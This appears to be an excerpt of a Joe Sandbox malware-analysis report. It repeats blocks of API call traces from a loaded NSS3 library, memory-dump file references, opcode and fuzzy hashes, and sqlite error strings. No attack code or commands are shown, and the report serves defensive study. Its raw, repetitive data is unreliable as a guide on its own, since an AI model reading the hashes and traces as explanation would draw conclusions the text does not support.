                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3155957115-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 26eb1b6d905b938495ebfba79db8eeec1fcc39bee9b4df57a2198bb4c3c44c81
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 59d7fad67511c3792eceba2e1b75138a5a8e990a3190bf913f1d6c7cfe43c8b9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26eb1b6d905b938495ebfba79db8eeec1fcc39bee9b4df57a2198bb4c3c44c81
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E9190B1A04205CFEB04CF65C884B6BB7F1BF45308B16462DE46A9BA60E734E956CB51
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CECBD48
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CECBD68
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CECBD83
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CECBD9E
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CECBDB9
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CECBDD0
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CECBDEA
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CECBE04
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CECBE1E
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2721248240-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a43e201486adc947d80b70e4478d57c16c4e88deaed5439ab8594bec88979fb0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4d0b3ff2600a216b3fe4c4c530f0d4fbd172a84289f7b96aff7d68a8dae23800
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a43e201486adc947d80b70e4478d57c16c4e88deaed5439ab8594bec88979fb0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5021A2F6F0429D5BFB008A569E43F8F36789BD1B4DF180128F936EE741E710941886A7
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC14E4,6CF2CC70), ref: 6CF78D47
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF78D98
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_GetPageSize.NSS3(6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_NewLogModule.NSS3(clock,6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F25
                                                                                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CF78E7B
                                                                                                                                                                                                                                                                                                                      • htons.WSOCK32(?), ref: 6CF78EDB
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF78F99
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF7910A
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                                                      • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                                                      • Opcode ID: bc22fd50e57a622542e891fb8358788df7f1ce19bd473e875cf8165544ec972e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f61b0819faea66d842e04bb42c2a0487afff81162d95950318f814e437236849
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc22fd50e57a622542e891fb8358788df7f1ce19bd473e875cf8165544ec972e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB02BB329052518FDB24CF19D4687AABBB3EF42308F1A825FD8915FA91C771DA49C7B0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetIdentitiesLayer.NSS3 ref: 6CEF68FC
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CEF6924
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CEF693E
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEF6977
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEF69B8
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CEF6B1E
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CEF6B39
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEF6B62
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4003455268-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4beacf346789a16db910c7b755aae0279785c9b024c27284ebd58d9f2fd8ae7b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b0f774d41136e977c4abe11d64cee4c3e0e3fa5f8c5df357284e39cb3d125851
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4beacf346789a16db910c7b755aae0279785c9b024c27284ebd58d9f2fd8ae7b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F915B74658200CBDB60DF2DC48065E7BBAFBC7308F718259D8649BA29C7759983CB92
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                      • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                                                                      • API String ID: 3168844106-1126224928
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ddca4e8a6fa639a0a54143601a7311c789b2387d7dcc067cf8a9d69644a4fd9b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 61d9cd37ea28c25b16eba83bf9cef28eed25fabfef4fb8c20aaf72c8d9ca895e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddca4e8a6fa639a0a54143601a7311c789b2387d7dcc067cf8a9d69644a4fd9b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3272A270E04205CFDB14CF68C480BAABBF1BF49308F1681ADD9659BB62D775E856CB90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,6CDEC52B), ref: 6CF19D53
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF1A035
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF1A114
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 717804543-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e41f889a91dc43d5faa6ea9eeb6a0a03bd161bcc82baec1c0c7f29d77e1efedc
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5706f11d4f9fa40e4d0c838c24403a4abde725d0f930871dcb8879b28fff31b0
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e41f889a91dc43d5faa6ea9eeb6a0a03bd161bcc82baec1c0c7f29d77e1efedc
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0622AC7160C3419FC704CF29C49066BBBE1BFCA344F148A2DE8DA97A51DB35E949CB82
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CDF8637,?,?), ref: 6CF39E88
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CDF8637), ref: 6CF39ED6
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CF39ECF
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF39EC0
                                                                                                                                                                                                                                                                                                                      • database corruption, xrefs: 6CF39ECA
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 44a19440c26c6366b97eb7d5000c609265b1ae1e110cdaf874d5112f2bf13577
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d49eecb911fe49da38643bd32072577fa60c9cdf1a87b3a4aab38efb78ca164b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44a19440c26c6366b97eb7d5000c609265b1ae1e110cdaf874d5112f2bf13577
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8881C971B011159FCB04CFAAC880ADEB7F6EF48304B159569D81AAB751DF31DE45CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF481BC
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                      • String ID: BINARY$out of memory
                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-3971123528
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5d81f713be72674d8174412a37fe6a055ea1581a15e2afc1fdcbd8261aa38d31
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c9abea0a877c7871bf0bf8c6a914e57d616036cc8a46ef9e84871e6971f87ab5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d81f713be72674d8174412a37fe6a055ea1581a15e2afc1fdcbd8261aa38d31
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C529071E05218DFDB14CF99C890BAEBBB2FF49318F25815AD815EB752D730A846CB90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CEC9ED6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CEC9EE4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEC9F38
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CEC9F0B), ref: 6CECD03B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CECD04E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CECD07B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CECD08E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CECD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CECD09D
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEC9F49
                                                                                                                                                                                                                                                                                                                      • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CEC9F59
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CEC9C5B), ref: 6CEC9D82
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CEC9C5B), ref: 6CEC9DA9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CEC9C5B), ref: 6CEC9DCE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CEC9C5B), ref: 6CEC9E43
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4287675220-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d29b0aded37e02a5cb25f70b2e70703632d1ae11e39ef2cc7ef06a56ed1ad818
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB112BB5F042415BF7109A659D02BAF77B4AF9478CF340138E82A9BB40FB61E9198293
                                                                                                                                                                                                                                                                                                                      APIs
